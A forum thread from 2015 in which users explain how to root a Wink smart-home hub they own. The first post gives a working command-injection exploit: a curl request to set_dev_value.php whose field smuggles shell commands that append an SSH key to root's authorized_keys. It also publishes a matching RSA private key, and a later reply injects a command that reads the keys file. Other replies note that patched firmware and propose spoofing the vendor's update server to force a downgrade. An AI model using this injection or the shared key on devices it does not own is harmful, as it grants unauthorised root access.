Rooting out of the box

CloneNum3
Site Admin
Posts: 107
Joined: Wed Jan 07, 2015 10:02 am

Rooting out of the box

Postby CloneNum3 » Thu Jan 08, 2015 9:07 am

First thing is to, well, plug it in ;)

Using your phone or device, open up the wink app and add the hub. This process will add the hub to your network.

Note: Do not "update" if it asks, we will do this manually later.

Replace the IP address of 192.168.0.1 below with the address your wink received. You can find this in your router's DHCP information.

Note #1: If you do not want it to have internet connectivity before having root, you can connect to the hub directly by setting your wireless device to 192.168.0.2 and connecting directly to the hub's access point

Note #2: I suggest using this specific RSA Key Pair because it does not have any + symbols. + symbols do not translate correctly in the curl command and breaks the process. You can remove the key and add your own after you have SSH and can enter it directly.

Code: Select all

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;echo ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2nCGCGeaPSWseFqi/ctWeamK56qlBmIcr0L9K0ZaAq43BHfITtLL7mteZMJYSn8PX3JMKNFJiCvvSW8gla2s4aBqb9F1EjazDKJnWKyzzdgEeUqr0T7t2pltvxxoZ/z/wEVMB5AKD9TjjTXRSoEBF7AJ/OfhjKHQiO5TLWPlUtk= rsa_1024_no-plus >> /root/.ssh/authorized_keys;"


Now use an SSH client such as putty to ssh to your wink hub. You will need the following private key in putty.

Code: Select all

-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDacIYIZ5o9Jax4WqL9y1Z5qYrnqqUGYhyvQv0rRloCrjcEd8hO
0svua15kwlhKfw9fckwo0UmIK+9JbyCVrazhoGpv0XUSNrMMomdYrLPN2AR5SqvR
Pu3amW2/HGhn/P/ARUwHkAoP1OONNdFKgQEXsAn85+GModCI7lMtY+VS2QIBIwKB
gQDN9RCo1rX/I4VbiKhOYKH9rnunOn5WecNGKTfYWEY9Cqjm9JhKUbj2vQE6bhi7
RJl3P+FoUEyk9jlifrhSnG/LrGR/2FfYT1bP5NLihDdak3yN3f2FLa6BrcL4N0Xt
iIgj4AnZIkh3YD4Qq03T45d6SFmvKsajG/fGkuUonA0/xwJBAP087QO2GOez4Fml
OgcAlgWgFY80Mog9hScfe0NMQ3jW1V3pWWwWDEiJsJKDniqeHjcnugC0CB2Dt5XI
7/17PqcCQQDc0m+S9TLrVYYYAXv6cMB7yQOR9l8KHgn4Et9/dOLEztReng2qQk6i
ZZxpvRFswlD9mmoW5npuZQ5AnvNMipJ/AkBeD1C4PFJksIaHsmYCmdFSi+rAKVSZ
AOhQXCZ4FQMeQSqt2lRp+Y+IqCukIkIP1FRdoQqSjAMDpfO7SqJINRdFAkB33/Nt
CMPe1qfhJWCPRIW/imEGGAe1CP4Y9E1xE5ELwLxt4MWW8MuZ/KVd+OwzufFzujmX
ZyyFEkmQy1DgaHtpAkEAo4L96oY3zlDpS3z7YepzEHX/X0ibGNBO1Q7wTxp1uRno
SCYumdpu3fNY8v06vRIBbW8rKDvk8JFVEppVk8ijKQ==
-----END RSA PRIVATE KEY-----


You should now have root on your wink :P

daleyse
Posts: 1
Joined: Sat Jan 17, 2015 8:12 pm

Re: Rooting out of the box

Postby daleyse » Sat Jan 17, 2015 8:15 pm

After running the cURL from cmd.exe, I get the following message:

ret_code=0

Is this telling me that the hub is already beyond version 0.33?

CloneNum3
Site Admin
Posts: 107
Joined: Wed Jan 07, 2015 10:02 am

Re: Rooting out of the box

Postby CloneNum3 » Thu Jan 22, 2015 9:11 pm

daleyse wrote:After running the cURL from cmd.exe, I get the following message:

ret_code=0

Is this telling me that the hub is already beyond version 0.33?


return code of 0 basically means "Success"...

if the curl command you sent was the addition of the SSH key, you can try logging in with the private key currently mentioned via putty or any SSH client... and/or you can use curl again to display the authorized_keys and make sure it looks right.

Code: Select all

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;cat /root/.ssh/authorized_keys;"


you should still get a ret_code=0, but this time, it should also spit out something like:

Code: Select all

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+tUvjj8lHuwVNS6qnEdGStscmiGND4PdTA0M8Nl6AQ/UZmz/VcpHPvwnRf7m4/NTDaqNzKMCkUbK6KrPdsq2MpEK+vQaUdVX9pSUylnGvmQl09uixF+gA+67BxKXRaCfb5t+gF7/d+h37ZYsSUieItg91RaNke/NwRY/TPP+lgpEYWGwKODMTZT1yjJTy6GCkNtgf9IjcIkrQ9WnXyJ7ZDSgAnzhaY+HgiZ6YC3pNWQ5eVzelqKrtIWRG4+qqC4LOOzMtqFDPEbAv4r/i7nWxgVxaE8tlWmmXC/49ab9QJndJ5r3NriAFV1YLjBCkd3uqllGuwlLQeVVg6jsuan6Z dev@winkapp.com - Dev access for winkhub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2nCGCGeaPSWseFqi/ctWeamK56qlBmIcr0L9K0ZaAq43BHfITtLL7mteZMJYSn8PX3JMKNFJiCvvSW8gla2s4aBqb9F1EjazDKJnWKyzzdgEeUqr0T7t2pltvxxoZ/z/wEVMB5AKD9TjjTXRSoEBF7AJ/OfhjKHQiO5TLWPlUtk= rsa_1024_no-plus

Stephenmg
Posts: 1
Joined: Sun Mar 15, 2015 6:36 pm

Re: Rooting out of the box

Postby Stephenmg » Sun Mar 15, 2015 6:47 pm

CloneNum3 wrote:Note #1: If you do not want it to have internet connectivity before having root, you can connect to the hub directly by setting your wireless device to 192.168.0.2 and connecting directly to the hub's access point


Does the above mean that there is no risk in a new Wink Hub updating on its own prior to rooting? i want to make sure before I start on mine most of the tutorials I've seen say to not let it connect to the internet before rooting.

Thanks

AC3
Posts: 2
Joined: Mon Apr 06, 2015 2:18 pm

Re: Rooting out of the box

Postby AC3 » Mon Apr 06, 2015 2:23 pm

I also have this same question. All of other tutorials I've seen say not to let it connect to the internet before rooting.

AC3
Posts: 2
Joined: Mon Apr 06, 2015 2:18 pm

Re: Rooting out of the box

Postby AC3 » Mon Apr 06, 2015 4:39 pm

Hello,
I am posting this as an FYI.

I have an existing wink hub that I updated to .77 before finding this page and other resources about rooting the wink hub.

So to get around this, I went to Home Depot and bought a second hub with the intention of rooting it. The new wink hub has apparently been flashed from the factory with firmware that no longer has the set_dev_value.php vulnerability. The box looked to be factory sealed so I would rule out the possibility of getting a wink hub that someone has already molested. From this site and other places online, it also looks like connecting through serial is not an option as well.

CURL just returns a 404 error:

Code: Select all

Last login: Mon Apr  6 11:28:31 on ttys000
iMac:~ iMacHome$ curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;echo ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2nCGCGeaPSWseFqi/ctWeamK56qlBmIcr0L9K0ZaAq43BHfITtLL7mteZMJYSn8PX3JMKNFJiCvvSW8gla2s4aBqb9F1EjazDKJnWKyzzdgEeUqr0T7t2pltvxxoZ/z/wEVMB5AKD9TjjTXRSoEBF7AJ/OfhjKHQiO5TLWPlUtk= rsa_1024_no-plus >> /root/.ssh/authorized_keys;"
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
 <head>
  <title>404 - Not Found</title>
 </head>
 <body>
  <h1>404 - Not Found</h1>
 </body>
</html>
iMac:~ iMacHome$



I will try returning this hub and going to a different location to get another wink hub but I fear that all the winks that are not being shipped from the factory are no longer rootable. Has anyone found a work around for this yet?

Lastly, since it was obvious that I could not root the new hub I bought, I went ahead and connected it to my Wink app. The Hub reports that is is firmware version 0.0.0 and my other one reports that is is version .77. It does not prompt me to update it. Very strange....

Thanks,

AC

elgremio
Posts: 1
Joined: Wed Apr 15, 2015 10:42 am

Re: Rooting out of the box

Postby elgremio » Wed Apr 15, 2015 10:50 am

Hi AC3.

I recently bought a Wink Hub at a local HomeDepot, I tried to root it without success (the PHPs exploits doesn't exist on it). Then I connected to Wink and the HUB reports also the version as 0.0.0

I have not found any info about this on any site.

cbnzb
Posts: 3
Joined: Mon Jul 06, 2015 9:38 am

Re: Rooting out of the box

Postby cbnzb » Mon Jul 06, 2015 5:33 pm

I assume this method doesn't work anymore. Can we still get root with a serial connection?

CloneNum3
Site Admin
Posts: 107
Joined: Wed Jan 07, 2015 10:02 am

Re: Rooting out of the box

Postby CloneNum3 » Wed Jul 08, 2015 10:46 pm

I suppose it depends on what level they're shipping with today, do you know?

I think the update boot should still be rootable... but can be tricky to root it and get in before it completes the update process and reboots on its own.

BuckSinister
Posts: 2
Joined: Mon Aug 03, 2015 6:51 am

Re: Rooting out of the box

Postby BuckSinister » Mon Aug 03, 2015 6:55 am

Old firmware Images?
Does anybody have copies of the the old firmware images that contained the php expolit? I would like to create a clone of the wink-hub-images.s3.amazonaws.com, but place the old image as the newest and change the checksums in the manifests, with the hope that my wink hub will autodowngrade. Has anyone tried this before?
I created a mini network, where the wink sites resolve to my own web servers. I have hit a bump in the road, since i can't find any rootable images to download to proceed further. Please contact me , send me a copy , or post a link to any old firmware you may be willing to share.


Return to “Root a new out of the box Wink”

Who is online

Users browsing this forum: No registered users and 1 guest